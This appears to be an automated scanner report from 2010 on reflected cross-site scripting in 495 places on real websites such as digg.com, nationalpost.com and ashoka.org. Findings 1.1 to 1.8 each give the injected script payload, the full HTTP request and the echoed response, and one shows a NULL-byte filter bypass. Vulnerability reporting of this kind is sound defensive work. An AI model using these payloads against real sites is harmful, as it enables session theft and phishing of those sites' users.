1.334. http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm [REST URL parameter 2]

1.335. http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm [REST URL parameter 3]

1.336. http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm [name of an arbitrarily supplied request parameter]

1.337. http://www.superpages.com/bp/xmlproxy [REST URL parameter 2]

1.338. http://www.superpages.com/coupons [name of an arbitrarily supplied request parameter]

1.339. http://www.swarmjam.com/waf.srv/sj/sj/cn [REST URL parameter 2]

1.340. http://www.swarmjam.com/waf.srv/sj/sj/cn [REST URL parameter 3]

1.341. http://www.swarmjam.com/waf.srv/sj/sj/cn [REST URL parameter 4]

1.342. http://www.thestar.com/Business/article/572653 [REST URL parameter 1]

1.343. http://www.thestar.com/Business/article/572653 [REST URL parameter 2]

1.344. http://www.ticketstonight.ca/ticketstonight/event.details.php [REST URL parameter 1]

1.345. http://www.vancouversun.com/business/ [REST URL parameter 1]

1.346. http://www.vancouversun.com/business/Private+secure+network+keeps+people+touch/ [REST URL parameter 1]

1.347. http://www.vancouversun.com/business/Private+secure+network+keeps+people+touch/ [REST URL parameter 2]

1.348. http://www.vancouversun.com/business/Private+secure+network+keeps+people+touch/3448945/ [REST URL parameter 1]

1.349. http://www.vancouversun.com/business/Private+secure+network+keeps+people+touch/3448945/ [REST URL parameter 2]

1.350. http://www.vancouversun.com/business/Private+secure+network+keeps+people+touch/3448945/ [REST URL parameter 3]

1.351. http://www.vancouversun.com/business/Private+secure+network+keeps+people+touch/3448945/story.html [REST URL parameter 3]

1.352. http://www.vancouversun.com/business/Private+secure+network+keeps+people+touch/3448945/story.html [REST URL parameter 4]

1.353. http://www.vancouversun.com/robots.txt [REST URL parameter 1]

1.354. http://www.viglink.com/account [name of an arbitrarily supplied request parameter]

1.355. http://www.viglink.com/dashboard [name of an arbitrarily supplied request parameter]

1.356. http://www.viglink.com/dashboard/weekly [name of an arbitrarily supplied request parameter]

1.357. http://www.viglink.com/tools/coverage [name of an arbitrarily supplied request parameter]

1.358. http://yellowpages.superpages.com/busprofile/css/busprofile.css [REST URL parameter 1]

1.359. http://yellowpages.superpages.com/busprofile/css/busprofile.css [REST URL parameter 2]

1.360. http://yellowpages.superpages.com/busprofile/css/busprofile.css [REST URL parameter 3]

1.361. http://yellowpages.superpages.com/busprofile/css/print.css [REST URL parameter 1]

1.362. http://yellowpages.superpages.com/busprofile/css/print.css [REST URL parameter 2]

1.363. http://yellowpages.superpages.com/busprofile/css/print.css [REST URL parameter 3]

1.364. http://yellowpages.superpages.com/busprofile/js/busprofile.js [REST URL parameter 1]

1.365. http://yellowpages.superpages.com/busprofile/js/busprofile.js [REST URL parameter 2]

1.366. http://yellowpages.superpages.com/busprofile/js/busprofile.js [REST URL parameter 3]

1.367. http://yellowpages.superpages.com/busprofile/js/csiframe.js [REST URL parameter 1]

1.368. http://yellowpages.superpages.com/busprofile/js/csiframe.js [REST URL parameter 2]

1.369. http://yellowpages.superpages.com/busprofile/js/csiframe.js [REST URL parameter 3]

1.370. http://yellowpages.superpages.com/busprofile/js/hide.js [REST URL parameter 1]

1.371. http://yellowpages.superpages.com/busprofile/js/hide.js [REST URL parameter 2]

1.372. http://yellowpages.superpages.com/busprofile/js/hide.js [REST URL parameter 3]

1.373. http://yellowpages.superpages.com/busprofile/js/photos.js [REST URL parameter 1]

1.374. http://yellowpages.superpages.com/busprofile/js/photos.js [REST URL parameter 2]

1.375. http://yellowpages.superpages.com/busprofile/js/photos.js [REST URL parameter 3]

1.376. http://yellowpages.superpages.com/busprofile/script.more.js [REST URL parameter 1]

1.377. http://yellowpages.superpages.com/busprofile/script.more.js [REST URL parameter 2]

1.378. http://yellowpages.superpages.com/common/css/forms.css [REST URL parameter 1]

1.379. http://yellowpages.superpages.com/common/css/forms.css [REST URL parameter 2]

1.380. http://yellowpages.superpages.com/common/css/forms.css [REST URL parameter 3]

1.381. http://yellowpages.superpages.com/common/css/print.css [REST URL parameter 1]

1.382. http://yellowpages.superpages.com/common/css/print.css [REST URL parameter 2]

1.383. http://yellowpages.superpages.com/common/css/print.css [REST URL parameter 3]

1.384. http://yellowpages.superpages.com/common/css/reset.css [REST URL parameter 1]

1.385. http://yellowpages.superpages.com/common/css/reset.css [REST URL parameter 2]

1.386. http://yellowpages.superpages.com/common/css/reset.css [REST URL parameter 3]

1.387. http://yellowpages.superpages.com/common/css/sendtom.css [REST URL parameter 1]

1.388. http://yellowpages.superpages.com/common/css/sendtom.css [REST URL parameter 2]

1.389. http://yellowpages.superpages.com/common/css/sendtom.css [REST URL parameter 3]

1.390. http://yellowpages.superpages.com/common/css/spcore.css [REST URL parameter 1]

1.391. http://yellowpages.superpages.com/common/css/spcore.css [REST URL parameter 2]

1.392. http://yellowpages.superpages.com/common/css/spcore.css [REST URL parameter 3]

1.393. http://yellowpages.superpages.com/common/css/spflyouts.1.0.css [REST URL parameter 1]

1.394. http://yellowpages.superpages.com/common/css/spflyouts.1.0.css [REST URL parameter 2]

1.395. http://yellowpages.superpages.com/common/css/spflyouts.1.0.css [REST URL parameter 3]

1.396. http://yellowpages.superpages.com/common/css/sppromoads.css [REST URL parameter 1]

1.397. http://yellowpages.superpages.com/common/css/sppromoads.css [REST URL parameter 2]

1.398. http://yellowpages.superpages.com/common/css/sppromoads.css [REST URL parameter 3]

1.399. http://yellowpages.superpages.com/common/css/structure.css [REST URL parameter 1]

1.400. http://yellowpages.superpages.com/common/css/structure.css [REST URL parameter 2]

1.401. http://yellowpages.superpages.com/common/css/structure.css [REST URL parameter 3]

1.402. http://yellowpages.superpages.com/common/css/styles.css [REST URL parameter 1]

1.403. http://yellowpages.superpages.com/common/css/styles.css [REST URL parameter 2]

1.404. http://yellowpages.superpages.com/common/css/styles.css [REST URL parameter 3]

1.405. http://yellowpages.superpages.com/common/css/typography.css [REST URL parameter 1]

1.406. http://yellowpages.superpages.com/common/css/typography.css [REST URL parameter 2]

1.407. http://yellowpages.superpages.com/common/css/typography.css [REST URL parameter 3]

1.408. http://yellowpages.superpages.com/common/js/alertcommon.js [REST URL parameter 1]

1.409. http://yellowpages.superpages.com/common/js/alertcommon.js [REST URL parameter 2]

1.410. http://yellowpages.superpages.com/common/js/alertcommon.js [REST URL parameter 3]

1.411. http://yellowpages.superpages.com/common/js/browser_check.js [REST URL parameter 1]

1.412. http://yellowpages.superpages.com/common/js/browser_check.js [REST URL parameter 2]

1.413. http://yellowpages.superpages.com/common/js/browser_check.js [REST URL parameter 3]

1.414. http://yellowpages.superpages.com/common/js/iepopup.js [REST URL parameter 1]

1.415. http://yellowpages.superpages.com/common/js/iepopup.js [REST URL parameter 2]

1.416. http://yellowpages.superpages.com/common/js/iepopup.js [REST URL parameter 3]

1.417. http://yellowpages.superpages.com/common/js/jquery-1.4.2.min.js [REST URL parameter 1]

1.418. http://yellowpages.superpages.com/common/js/jquery-1.4.2.min.js [REST URL parameter 2]

1.419. http://yellowpages.superpages.com/common/js/jquery-1.4.2.min.js [REST URL parameter 3]

1.420. http://yellowpages.superpages.com/common/js/jquery-plugins.js [REST URL parameter 1]

1.421. http://yellowpages.superpages.com/common/js/jquery-plugins.js [REST URL parameter 2]

1.422. http://yellowpages.superpages.com/common/js/jquery-plugins.js [REST URL parameter 3]

1.423. http://yellowpages.superpages.com/common/js/jquery.history_remote.js [REST URL parameter 1]

1.424. http://yellowpages.superpages.com/common/js/jquery.history_remote.js [REST URL parameter 2]

1.425. http://yellowpages.superpages.com/common/js/jquery.history_remote.js [REST URL parameter 3]

1.426. http://yellowpages.superpages.com/common/js/jquery.spac.js [REST URL parameter 1]

1.427. http://yellowpages.superpages.com/common/js/jquery.spac.js [REST URL parameter 2]

1.428. http://yellowpages.superpages.com/common/js/jquery.spac.js [REST URL parameter 3]

1.429. http://yellowpages.superpages.com/common/js/jquery.sptabs.js [REST URL parameter 1]

1.430. http://yellowpages.superpages.com/common/js/jquery.sptabs.js [REST URL parameter 2]

1.431. http://yellowpages.superpages.com/common/js/jquery.sptabs.js [REST URL parameter 3]

1.432. http://yellowpages.superpages.com/common/js/omniture_onclick.js [REST URL parameter 1]

1.433. http://yellowpages.superpages.com/common/js/omniture_onclick.js [REST URL parameter 2]

1.434. http://yellowpages.superpages.com/common/js/omniture_onclick.js [REST URL parameter 3]

1.435. http://yellowpages.superpages.com/common/js/recently_viewed.js [REST URL parameter 1]

1.436. http://yellowpages.superpages.com/common/js/recently_viewed.js [REST URL parameter 2]

1.437. http://yellowpages.superpages.com/common/js/recently_viewed.js [REST URL parameter 3]

1.438. http://yellowpages.superpages.com/common/js/s_code.js [REST URL parameter 1]

1.439. http://yellowpages.superpages.com/common/js/s_code.js [REST URL parameter 2]

1.440. http://yellowpages.superpages.com/common/js/s_code.js [REST URL parameter 3]

1.441. http://yellowpages.superpages.com/common/js/sendtom.js [REST URL parameter 1]

1.442. http://yellowpages.superpages.com/common/js/sendtom.js [REST URL parameter 2]

1.443. http://yellowpages.superpages.com/common/js/sendtom.js [REST URL parameter 3]

1.444. http://yellowpages.superpages.com/common/js/spflyouts.1.0.js [REST URL parameter 1]

1.445. http://yellowpages.superpages.com/common/js/spflyouts.1.0.js [REST URL parameter 2]

1.446. http://yellowpages.superpages.com/common/js/spflyouts.1.0.js [REST URL parameter 3]

1.447. http://yellowpages.superpages.com/common/js/stPtsDropDown.js [REST URL parameter 1]

1.448. http://yellowpages.superpages.com/common/js/stPtsDropDown.js [REST URL parameter 2]

1.449. http://yellowpages.superpages.com/common/js/stPtsDropDown.js [REST URL parameter 3]

1.450. http://yellowpages.superpages.com/common/js/swfobject.js [REST URL parameter 1]

1.451. http://yellowpages.superpages.com/common/js/swfobject.js [REST URL parameter 2]

1.452. http://yellowpages.superpages.com/common/js/swfobject.js [REST URL parameter 3]

1.453. http://yellowpages.superpages.com/common/js/widget.js [REST URL parameter 1]

1.454. http://yellowpages.superpages.com/common/js/widget.js [REST URL parameter 2]

1.455. http://yellowpages.superpages.com/common/js/widget.js [REST URL parameter 3]

1.456. http://yellowpages.superpages.com/common/shared.js [REST URL parameter 1]

1.457. http://yellowpages.superpages.com/common/shared.js [REST URL parameter 2]

1.458. http://yellowpages.superpages.com/forms/js/verifyShopping.js [REST URL parameter 1]

1.459. http://yellowpages.superpages.com/forms/js/verifyShopping.js [REST URL parameter 2]

1.460. http://yellowpages.superpages.com/forms/js/verifyShopping.js [REST URL parameter 3]

1.461. http://yellowpages.superpages.com/profile.jsp [REST URL parameter 1]

1.462. http://yellowpages.superpages.com/profile.jsp [name of an arbitrarily supplied request parameter]

1.463. http://yellowpages.superpages.com/profiler/abook.jsp [REST URL parameter 1]

1.464. http://yellowpages.superpages.com/profiler/abook.jsp [REST URL parameter 2]

1.465. http://yellowpages.superpages.com/profiler/abook.jsp [couponsLoc parameter]

1.466. http://yellowpages.superpages.com/profiler/abook.jsp [requestAction parameter]

1.467. http://yellowpages.superpages.com/profiler/css/alert.css [REST URL parameter 1]

1.468. http://yellowpages.superpages.com/profiler/css/alert.css [REST URL parameter 2]

1.469. http://yellowpages.superpages.com/profiler/css/alert.css [REST URL parameter 3]

1.470. http://yellowpages.superpages.com/profiler/js/mydir.js [REST URL parameter 1]

1.471. http://yellowpages.superpages.com/profiler/js/mydir.js [REST URL parameter 2]

1.472. http://yellowpages.superpages.com/profiler/js/mydir.js [REST URL parameter 3]

1.473. http://yellowpages.superpages.com/reviews/js/ajaxreviews.js [REST URL parameter 1]

1.474. http://yellowpages.superpages.com/reviews/js/ajaxreviews.js [REST URL parameter 2]

1.475. http://yellowpages.superpages.com/reviews/js/ajaxreviews.js [REST URL parameter 3]

1.476. http://yellowpages.superpages.com/reviews/js/logclick.js [REST URL parameter 1]

1.477. http://yellowpages.superpages.com/reviews/js/logclick.js [REST URL parameter 2]

1.478. http://yellowpages.superpages.com/reviews/js/logclick.js [REST URL parameter 3]

1.479. http://yellowpages.superpages.com/reviews/js/toggle.js [REST URL parameter 1]

1.480. http://yellowpages.superpages.com/reviews/js/toggle.js [REST URL parameter 2]

1.481. http://yellowpages.superpages.com/reviews/js/toggle.js [REST URL parameter 3]

1.482. http://yellowpages.superpages.com/reviews/js/toggleVote.js [REST URL parameter 1]

1.483. http://yellowpages.superpages.com/reviews/js/toggleVote.js [REST URL parameter 2]

1.484. http://yellowpages.superpages.com/reviews/js/toggleVote.js [REST URL parameter 3]

1.485. http://yellowpages.superpages.com/se/compositepage.css [REST URL parameter 1]

1.486. http://yellowpages.superpages.com/se/compositepage.css [REST URL parameter 2]

1.487. http://yellowpages.superpages.com/yp/js/addList.js [REST URL parameter 1]

1.488. http://yellowpages.superpages.com/yp/js/addList.js [REST URL parameter 2]

1.489. http://yellowpages.superpages.com/yp/js/addList.js [REST URL parameter 3]

1.490. http://yellowpages.superpages.com/yp/js/showHide.js [REST URL parameter 1]

1.491. http://yellowpages.superpages.com/yp/js/showHide.js [REST URL parameter 2]

1.492. http://yellowpages.superpages.com/yp/js/showHide.js [REST URL parameter 3]

1.493. http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm [User-Agent HTTP header]

1.494. http://www.plan.ca/registration/index.cfm [action parameter]

1.495. http://www.plan.ca/registration/index.cfm [name of an arbitrarily supplied request parameter]



1. Cross-site scripting (reflected)
There are 495 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://digg.com/submit [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %003b3c6"><script>alert(1)</script>f91c047f372 was submitted in the REST URL parameter 1. This input was echoed as 3b3c6"><script>alert(1)</script>f91c047f372 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /submit%003b3c6"><script>alert(1)</script>f91c047f372 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 02:56:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=2229000340571694017%3A141; expires=Tue, 18-Jan-2011 02:56:51 GMT; path=/; domain=digg.com
Set-Cookie: d=9d228c1b60508bfe9e16e518511a2d9023a3f67d9b8d81c49755c32e9cfd6664; expires=Fri, 18-Dec-2020 13:04:31 GMT; path=/; domain=.digg.com
X-Digg-Time: D=223201 10.2.129.225
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15306

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg - error_ - Profile</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics,
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/submit%003b3c6"><script>alert(1)</script>f91c047f372.rss">
...[SNIP]...

1.2. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/cj_K_lW0d4-YQ44GSY9bNGTqTq0kx1yD/view.html [[Place%20Your%20Cache%20Buster%20ID%20here]&ASTPCT parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://this.content.served.by.adshuffle.com
Path:   /p/kl/46/799/r/12/4/8/ast0k3n/cj_K_lW0d4-YQ44GSY9bNGTqTq0kx1yD/view.html

Issue detail

The value of the [Place%20Your%20Cache%20Buster%20ID%20here]&ASTPCT request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6f2f1'-alert(1)-'c17a993ea7e was submitted in the [Place%20Your%20Cache%20Buster%20ID%20here]&ASTPCT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /p/kl/46/799/r/12/4/8/ast0k3n/cj_K_lW0d4-YQ44GSY9bNGTqTq0kx1yD/view.html?[Place%20Your%20Cache%20Buster%20ID%20here]&ASTPCT=6f2f1'-alert(1)-'c17a993ea7e HTTP/1.1
Host: this.content.served.by.adshuffle.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v=576462396861659244; ts=12/13/2010+9:01:05+PM; z=4; sid=b6ff4608-269f-4916-824f-4c4e6c59df4e; av1=c0596.61a68=1213101501:51f37.5cfcb=1214101419; vcs0=vC0596:61A68_0_0_0_1FB2C5_0_0|v51F37:5CFCB_0_0_0_1FB83B_0_0

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache="Set-Cookie"
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:03:02 GMT
Server: Microsoft-IIS/7.0
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: av1=c0596.61a68=1213101501:51f37.5cfcb=1214101419:b8fb4.6339b=1218102102; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: vcs0=vC0596:61A68_0_0_0_1FB2C5_0_0|v51F37:5CFCB_0_0_0_1FB83B_0_0|vB8FB4:6339B_0_0_0_1FD04E_0_0; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Date: Sun, 19 Dec 2010 03:03:01 GMT
Content-Length: 1128
Set-Cookie: NSC_betivggmf-opef=ffffffff0908150d45525d5f4f58455e445a4a423660;expires=Sun, 19-Dec-2010 03:08:02 GMT;path=/

<html><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script type="text/javascript" src="http://media2.adshuffle.com/asrefinc11.js"></script><script type="text/javascript"
...[SNIP]...
<a target="_blank" href="6f2f1'-alert(1)-'c17a993ea7ehttp://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8'+window._asPURL+'/590824264/v/576462396861659244/ac/757684/b/266875/c/406428/click.html">
...[SNIP]...

1.3. http://vancouverdisabilitiesday.ca/%20target= [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vancouverdisabilitiesday.ca
Path:   /%20target=

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb8d8"><script>alert(1)</script>2c87a4594e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /%20target=?eb8d8"><script>alert(1)</script>2c87a4594e5=1 HTTP/1.1
Host: vancouverdisabilitiesday.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 03:05:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 727
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSSAARTS=BHHGAGICMPCFNDPLDIPAAJMM; path=/
Cache-control: private


<html>
<head>
<title>International Day of Persons with Disabilities</title>
<meta name="description" content="Dec. 3, 2008 Roundhouse Community Centre">
<meta name="keywords" content="dis
...[SNIP]...
<frame src="http://members.shaw.ca/ckiyooka// target=?eb8d8"><script>alert(1)</script>2c87a4594e5=1" name="pageRedirect">
...[SNIP]...

1.4. http://ww3.nationalpost.com/services/email/share/ [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ww3.nationalpost.com
Path:   /services/email/share/

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload a9d18<script>alert(1)</script>98cf4f6e2eb was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services/email/share/?callback=?a9d18<script>alert(1)</script>98cf4f6e2eb HTTP/1.1
Host: ww3.nationalpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 03:06:34 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 62
Connection: close
Content-Type: application/json

?a9d18<script>alert(1)</script>98cf4f6e2eb({"success": false})

1.5. http://ww3.nationalpost.com/services/pluck/atc/ [returnurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ww3.nationalpost.com
Path:   /services/pluck/atc/

Issue detail

The value of the returnurl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 43f89'%3balert(1)//ba364a55228 was submitted in the returnurl parameter. This input was echoed as 43f89';alert(1)//ba364a55228 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /services/pluck/atc/?returnurl=43f89'%3balert(1)//ba364a55228 HTTP/1.1
Host: ww3.nationalpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 03:06:32 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Length: 251
Connection: close
Content-Type: text/html; charset=UTF-8

<html><head>
<script type="text/javascript" src="http://members.canada.com/scripts/pluck.ashx"></script>
<script type="text/javascript">
document.location='43f89';alert(1)//ba364a55228';
</script>
...[SNIP]...

1.6. http://www.advisorworld.com/Compare-Annuity-Rates-2 [utm_source parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.advisorworld.com
Path:   /Compare-Annuity-Rates-2

Issue detail

The value of the utm_source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f878a"><script>alert(1)</script>30b222b59b0 was submitted in the utm_source parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /Compare-Annuity-Rates-2?utm_source=Googlef878a"><script>alert(1)</script>30b222b59b0&utm_campaign=annuity_placement_targeting HTTP/1.1
Host: www.advisorworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 03:06:12 GMT
Server: Apache/1.3.42 (Unix) PHP/5.2.14 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Cache-Control: max-age=1209600
Expires: Sun, 02 Jan 2011 03:06:12 GMT
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 16857

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input type="hidden" id="source" name="web_source" value="Googlef878a"><script>alert(1)</script>30b222b59b0" />
...[SNIP]...

1.7. http://www.ashoka.org/story/6495 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ashoka.org
Path:   /story/6495

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5291e"><script>alert(1)</script>8b1ed0d8a05 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /story/6495?5291e"><script>alert(1)</script>8b1ed0d8a05=1 HTTP/1.1
Host: www.ashoka.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 03:06:17 GMT
Server: Apache/2.2.0 (Fedora)
X-Powered-By: PHP/5.2.8
Set-Cookie: SESS08b657267a8ac8cb7d48d3a9cb134ad3=3gddqs6ddqmdpo5f9i2v30mlb7; expires=Tue, 11 Jan 2011 06:39:37 GMT; path=/; domain=.ashoka.org
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 19 Dec 2010 03:06:17 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 26921

<!-- This comment is intentional to keep the back compat in ie 7.0 -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http:/
...[SNIP]...
<a name="fb_share" type="button_count" share_url="http://www.ashoka.org/story/6495?5291e"><script>alert(1)</script>8b1ed0d8a05=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.8. http://www.ashoka.org/story/6495 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ashoka.org
Path:   /story/6495

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 773df'-alert(1)-'5b4b835de75 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /story/6495?773df'-alert(1)-'5b4b835de75=1 HTTP/1.1
Host: www.ashoka.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 03:06:18 GMT
Server: Apache/2.2.0 (Fedora)
X-Powered-By: PHP/5.2.8
Set-Cookie: SESS08b657267a8ac8cb7d48d3a9cb134ad3=dsp2ml8nb8mjok58innb7rlpl2; expires=Tue, 11 Jan 2011 06:39:38 GMT; path=/; domain=.ashoka.org
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 19 Dec 2010 03:06:18 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 26876

<!-- This comment is intentional to keep the back compat in ie 7.0 -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http:/
...[SNIP]...
<script>tweetmeme_style = 'compact'; tweetmeme_url = 'http://www.ashoka.org/story/6495?773df'-alert(1)-'5b4b835de75=1'; tweetmeme_source = '';</script>
